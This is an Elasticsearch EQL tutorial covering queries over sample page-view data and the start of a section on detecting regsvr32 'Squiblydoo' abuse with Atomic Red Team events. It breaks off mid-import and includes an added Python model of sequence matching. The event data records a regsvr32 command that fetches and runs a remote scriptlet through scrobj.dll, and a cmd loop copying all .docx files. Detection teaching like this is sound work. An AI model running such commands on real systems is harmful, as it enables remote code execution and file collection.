Elasticsearch 13: Operations on 8.x
1. Introduction to EQL
(1) Overview
EQL stands for Event Query Language. The Event Query Language (EQL) is a query language for event-based time-series data such as logs, metrics and traces. On the Elastic Security platform, when valid EQL is submitted, the query is compiled on the data nodes, executed, and the results are returned. All of this happens quickly and in parallel, so the user sees results right away.
(2) Advantages
**EQL lets you express relationships between events:** Many query languages let you match a single event. EQL lets you match a series of events across different event categories and time spans.
**EQL has a low learning curve:** EQL syntax looks like other common query languages such as SQL. EQL lets you write and read queries intuitively, which makes fast, iterative searching possible.
**EQL is designed for security use cases:** Although you can use it for any event-based data, we created EQL for threat hunting. EQL not only supports searching for indicators of compromise (IOCs), it can also describe activity that goes beyond IOCs.
2. Basic EQL syntax
(1) Preparing the data
To run an EQL search, the data stream or index being searched must contain a timestamp field and an event category field. By default, EQL uses the @timestamp and event.category fields from the Elastic Common Schema (ECS): @timestamp holds the timestamp and event.category holds the event classification. Let's prepare some simple data representing page navigation on an e-commerce site.
# Create the index
PUT /gmall
# Add documents in bulk
PUT _bulk
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:00:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" , "last_page_id" : "" , "page_id" : "login" , "user_id" : "" } }
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:01:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" , "last_page_id" : "login" , "page_id" : "good_list" , "user_id" : "1" } }
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:05:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" , "last_page_id" : "good_list" , "page_id" : "good_detail" , "user_id" : "1" } }
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:07:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" , "last_page_id" : "good_detail" , "page_id" : "order" , "user_id" : "1" } }
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:08:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" , "last_page_id" : "order" , "page_id" : "payment" , "user_id" : "1" } }
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:08:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125102" , "last_page_id" : "" , "page_id" : "login" , "user_id" : "2" } }
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:08:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125102" , "last_page_id" : "login" , "page_id" : "payment" , "user_id" : "2" } }
# Response
{
"errors" : false ,
"took" : 195901276 ,
"items" : [
{
"index" : {
"_index" : "gmall" ,
"_id" : "nEyFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 0 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "gmall" ,
"_id" : "nUyFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 1 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "gmall" ,
"_id" : "nkyFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 2 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "gmall" ,
"_id" : "n0yFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 3 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "gmall" ,
"_id" : "oEyFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 4 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "gmall" ,
"_id" : "oUyFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 5 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "gmall" ,
"_id" : "okyFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 6 ,
"_primary_term" : 1 ,
"status" : 201
}
}
]
}
(2) Searching a window of data
During incident response it is often useful to know every event that happened at a particular time. The special event type named any matches events of every category; to match only one category of event, name that event category in place of any.
# Request
GET /gmall/_eql/search
{
"query" : """
any where page.user_id == "1"
"""
}
# Response
{
"is_partial" : false ,
"is_running" : false ,
"took" : 0 ,
"timed_out" : false ,
"hits" : {
"total" : {
"value" : 4 ,
"relation" : "eq"
} ,
"events" : [
{
"_index" : "gmall" ,
"_id" : "nUyFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:01:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "login" ,
"page_id" : "good_list" ,
"user_id" : "1"
}
}
} ,
{
"_index" : "gmall" ,
"_id" : "nkyFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:05:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "good_list" ,
"page_id" : "good_detail" ,
"user_id" : "1"
}
}
} ,
{
"_index" : "gmall" ,
"_id" : "n0yFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:07:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "good_detail" ,
"page_id" : "order" ,
"user_id" : "1"
}
}
} ,
{
"_index" : "gmall" ,
"_id" : "oEyFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:08:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "order" ,
"page_id" : "payment" ,
"user_id" : "1"
}
}
}
]
}
}
(3) Counting the events that match a condition
The filter parameter is a Query DSL filter applied to the events before the EQL query runs. Here the range is given in epoch milliseconds: 1654056000000 is 2022-06-01T12:00:00+08:00, so the five-second window below matches only the first login event.
# Request
GET /gmall/_eql/search
{
"query" : """
any where true
""",
"filter" : {
"range" : {
"@timestamp" : {
"gte" : "1654056000000" ,
"lt" : "1654056005000"
}
}
}
}
# Response
{
"is_partial" : false ,
"is_running" : false ,
"took" : 0 ,
"timed_out" : false ,
"hits" : {
"total" : {
"value" : 1 ,
"relation" : "eq"
} ,
"events" : [
{
"_index" : "gmall" ,
"_id" : "nEyFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:00:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "" ,
"page_id" : "login" ,
"user_id" : ""
}
}
}
]
}
}
(4) Event sequences
This finds sessions that first visited the login page and later visited the good_detail page. sequence by page.session_id groups the events by page.session_id, so both events must belong to the same session and occur in that order.
# Request
GET /gmall/_eql/search
{
"query" : """
sequence by page.session_id
[ page where page.page_id == "login" ]
[ page where page.page_id == "good_detail" ]
"""
}
# Response
{
"is_partial" : false ,
"is_running" : false ,
"took" : 16 ,
"timed_out" : false ,
"hits" : {
"total" : {
"value" : 1 ,
"relation" : "eq"
} ,
"sequences" : [
{
"join_keys" : [
"42FC7E13-CB3E-5C05-0000-0010A0125101"
] ,
"events" : [
{
"_index" : "gmall" ,
"_id" : "nEyFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:00:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "" ,
"page_id" : "login" ,
"user_id" : ""
}
}
} ,
{
"_index" : "gmall" ,
"_id" : "nkyFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:05:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "good_list" ,
"page_id" : "good_detail" ,
"user_id" : "1"
}
}
}
]
}
]
}
}
3. Security detection with EQL
(1) Preparing the data
regsvr32.exe is a built-in command-line utility used to register .dll libraries on Windows. As a native tool, regsvr32.exe has trusted status, which lets it bypass most allow-listing software and script blockers. An attacker with access to a user's command line can use regsvr32.exe to run malicious scripts through a .dll library, even where those scripts would otherwise not be allowed to run. One common variant of regsvr32 abuse is the Squiblydoo attack. In a Squiblydoo attack, a regsvr32.exe command registers and runs a remote script using the scrobj.dll library. The test data comes from the Atomic Red Team test dataset and includes events that mimic a Squiblydoo attack.
# Create the index
PUT my-eql-index
# Import the data
POST my-eql-index/_bulk?pretty&refresh
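The sequence by matching from section 2(4) and the regsvr32.exe/scrobj.dll activity captured in this section's dataset, as an added example that is not code from the original page or from Elasticsearch: a small Python model of how EQL groups events by join key and matches stages in time order, run over constructed copies of the gmall page views and of the Atomic Red Team process and library events. It assumes a simplified matcher (one pending sequence per join key, a newer first-stage match replaces the pending one, no maxspan/until), and the regsvr32.exe-then-scrobj.dll sequence is my own detection query, not one the page gives.

```python
"""Added example, not from the page or Elasticsearch: a local model of EQL
`sequence by <key> [stage] [stage]`. Assumption: one in-flight sequence per join
key and a newer first-stage match replaces a pending one; maxspan/until are not modelled."""
from datetime import datetime
from typing import Any, Callable, Dict, List

Event = Dict[str, Any]

def get(event: Event, dotted: str) -> Any:
    """Resolve an ECS-style dotted field path such as "process.parent.name"."""
    cur: Any = event
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur

def stage(category: str, **equals: Any) -> Callable[[Event], bool]:
    """`[<category> where f1 == v1 and ...]`; keyword names use '__' for '.'."""
    fields = {k.replace("__", "."): v for k, v in equals.items()}
    return lambda ev: (get(ev, "event.category") == category
                       and all(get(ev, f) == v for f, v in fields.items()))

def timestamp(ev: Event) -> Any:  # ISO 8601 string or raw numeric tick value
    v = ev["@timestamp"]
    return v if isinstance(v, (int, float)) else datetime.fromisoformat(v)

def sequence_by(events: List[Event], key: str,
                stages: List[Callable[[Event], bool]]) -> List[List[Event]]:
    """Return every completed sequence as the list of its matched events."""
    pending: Dict[Any, List[Event]] = {}      # join key -> partial sequence
    matches: List[List[Event]] = []
    for ev in sorted(events, key=timestamp):  # EQL walks events in time order
        k = get(ev, key)
        if k is None:
            continue                          # no join key: never part of a sequence
        partial = pending.get(k)
        if partial and stages[len(partial)](ev):
            partial.append(ev)
            if len(partial) == len(stages):
                matches.append(pending.pop(k))
        elif stages[0](ev):
            pending[k] = [ev]                 # (re)start the sequence for this key
    return matches

# Constructed sample: the seven page-view events of the gmall walkthrough.
S1 = "42FC7E13-CB3E-5C05-0000-0010A0125101"
S2 = "42FC7E13-CB3E-5C05-0000-0010A0125102"

def page_event(ts: str, session: str, page_id: str, last: str, user: str) -> Event:
    return {"@timestamp": ts, "event": {"category": "page"}, "page": {
        "session_id": session, "page_id": page_id, "last_page_id": last, "user_id": user}}

PAGE_EVENTS = [
    page_event("2022-06-01T12:00:00+08:00", S1, "login", "", ""),
    page_event("2022-06-01T12:01:00+08:00", S1, "good_list", "login", "1"),
    page_event("2022-06-01T12:05:00+08:00", S1, "good_detail", "good_list", "1"),
    page_event("2022-06-01T12:07:00+08:00", S1, "order", "good_detail", "1"),
    page_event("2022-06-01T12:08:00+08:00", S1, "payment", "order", "1"),
    page_event("2022-06-01T12:08:00+08:00", S2, "login", "", "2"),
    page_event("2022-06-01T12:08:00+08:00", S2, "payment", "login", "2"),
]

def page_funnel_sequences() -> List[List[Event]]:
    """sequence by page.session_id [page where page.page_id == "login"]
                                   [page where page.page_id == "good_detail"]"""
    return sequence_by(PAGE_EVENTS, "page.session_id",
                       [stage("page", page__page_id="login"),
                        stage("page", page__page_id="good_detail")])

# Constructed sample modelled on the Atomic Red Team events: benign cmd.exe, then regsvr32.exe loading scrobj.dll.
CMD = "{42FC7E13-CB3E-5C05-0000-0010A0125101}"
REG = "{42FC7E13-CBCB-5C05-0000-0010A0395401}"

def proc_event(ts: int, entity: str, name: str, etype: str) -> Event:
    return {"@timestamp": ts, "event": {"category": "process", "type": etype},
            "process": {"name": name, "entity_id": entity}}

def dll_event(ts: int, entity: str, name: str, dll: str) -> Event:
    return {"@timestamp": ts, "event": {"category": "library"},
            "process": {"name": name, "entity_id": entity}, "dll": {"name": dll}}

ENDPOINT_EVENTS = [
    proc_event(131883571822010000, CMD, "cmd.exe", "creation"),
    dll_event(131883571822020000, CMD, "cmd.exe", "ntdll.dll"),
    proc_event(131883573237130000, REG, "regsvr32.exe", "creation"),
    dll_event(131883573237140000, REG, "regsvr32.exe", "ntdll.dll"),
    dll_event(131883573237450016, REG, "regsvr32.exe", "scrobj.dll"),
]

def squiblydoo_sequences() -> List[List[Event]]:
    """sequence by process.entity_id [process where event.type == "creation" and
       process.name == "regsvr32.exe"] [library where dll.name == "scrobj.dll"]"""
    return sequence_by(ENDPOINT_EVENTS, "process.entity_id",
                       [stage("process", event__type="creation", process__name="regsvr32.exe"),
                        stage("library", dll__name="scrobj.dll")])

if __name__ == "__main__":
    print([[get(e, "page.page_id") for e in s] for s in page_funnel_sequences()])
    print([[get(e, "event.category") for e in s] for s in squiblydoo_sequences()])
```

Only session ...101 yields a login/good_detail sequence (session ...102 goes from login straight to payment), and only the regsvr32.exe entity yields a process-creation/scrobj.dll-load sequence, mirroring the single hit the page's sequence query returns.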
{ "index" : { } }
{ "process" : { "parent" : { "name" : "powershell.exe" , "entity_id" : "{42FC7E13-C11D-5C05-0000-0010C6E90401}" , "executable" : "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" } , "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "command_line" : "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"for /R c: %%f in (*.docx) do copy %%f c:\\temp\\\"" , "executable" : "C:\\Windows\\System32\\cmd.exe" , "ppid" : 7036 } , "logon_id" : 217055 , "@timestamp" : 131883571822010000 , "event" : { "category" : "process" , "type" : "creation" } , "user" : { "full_name" : "bob" , "domain" : "ART-DESKTOP" , "id" : "ART-DESKTOP\\bob" } }
{ "index" : { } }
{ "process" : { "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\cmd.exe" , "name" : "cmd.exe" } , "@timestamp" : 131883571821990000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ntdll.dll" , "name" : "ntdll.dll" } , "@timestamp" : 131883571821990000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\kernel32.dll" , "name" : "kernel32.dll" } , "@timestamp" : 131883571821990000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\KernelBase.dll" , "name" : "KernelBase.dll" } , "@timestamp" : 131883571821990000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\msvcrt.dll" , "name" : "msvcrt.dll" } , "@timestamp" : 131883571821990000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "@timestamp" : 131883571822140000 , "event" : { "category" : "process" , "type" : "terminate" } }
{ "index" : { } }
{ "process" : { "parent" : { "name" : "cmd.exe" , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010AA385401}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "command_line" : "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" , "ppid" : 2652 } , "logon_id" : 217055 , "@timestamp" : 131883573237130000 , "event" : { "category" : "process" , "type" : "creation" } , "user" : { "full_name" : "bob" , "domain" : "ART-DESKTOP" , "id" : "ART-DESKTOP\\bob" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\regsvr32.exe" , "name" : "regsvr32.exe" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ntdll.dll" , "name" : "ntdll.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\kernel32.dll" , "name" : "kernel32.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\KernelBase.dll" , "name" : "KernelBase.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\apphelp.dll" , "name" : "apphelp.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\AcLayers.dll" , "name" : "AcLayers.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\msvcrt.dll" , "name" : "msvcrt.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\user32.dll" , "name" : "user32.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\win32u.dll" , "name" : "win32u.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\gdi32.dll" , "name" : "gdi32.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\gdi32full.dll" , "name" : "gdi32full.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\msvcp_win.dll" , "name" : "msvcp_win.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ucrtbase.dll" , "name" : "ucrtbase.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\shlwapi.dll" , "name" : "shlwapi.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\combase.dll" , "name" : "combase.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\rpcrt4.dll" , "name" : "rpcrt4.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\bcryptprimitives.dll" , "name" : "bcryptprimitives.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\sfc.dll" , "name" : "sfc.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\winspool.drv" , "name" : "winspool.drv" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\kernel.appcore.dll" , "name" : "kernel.appcore.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\propsys.dll" , "name" : "propsys.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\oleaut32.dll" , "name" : "oleaut32.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\SHCore.dll" , "name" : "SHCore.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\sechost.dll" , "name" : "sechost.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\IPHLPAPI.DLL" , "name" : "IPHLPAPI.DLL" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\bcrypt.dll" , "name" : "bcrypt.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\sfc.dll" , "name" : "sfc.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\sfc_os.dll" , "name" : "sfc_os.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\imm32.dll" , "name" : "imm32.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ole32.dll" , "name" : "ole32.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
